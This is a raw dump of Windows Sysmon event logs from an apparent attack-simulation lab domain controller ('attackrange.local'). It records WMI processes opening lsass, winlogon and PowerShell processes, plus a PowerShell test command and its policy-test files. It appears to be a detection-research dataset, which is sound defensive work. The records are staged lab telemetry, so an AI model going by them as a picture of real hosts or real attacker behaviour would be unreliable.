16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002240508Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_uid5l5sx.4ob.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240507Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240506Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240505Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240504Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.514{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240503Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240502Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.498{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240501Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.498{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-BEAA-00000000AD01}11800C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240500Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.498{05ADC7E1-229F-6039-1600-00000000AD01}154011112C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002240499Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.498{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C6A111C88B7F5D69DE80B7624AF4210,SHA256=830D489359051726AB8993ECE2F5F83EBA231DD79C74F415DDBFE34B5B9BABED,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002240498Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.498{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240497Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.498{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240496Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240495Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240494Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240493Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240492Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.475{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002240491Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.475{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002240490Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.495{05ADC7E1-6DAB-603E-BDAA-00000000AD01}15852C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Comman Write-Host 4282e09e-1f8a-48b4-84c7-0495e91fd332C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002240489Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.475{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_uid5l5sx.4ob.ps12021-03-02 16:54:03.475 10341000x80000000000000002240488Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.475{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002240487Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.471{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BCAA-00000000AD01}9400C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240486Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.470{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BBAA-00000000AD01}14536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240485Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.470{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-BAAA-00000000AD01}7868C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240484Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:03.469{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6DAB-603E-B9AA-00000000AD01}12728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002240483Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 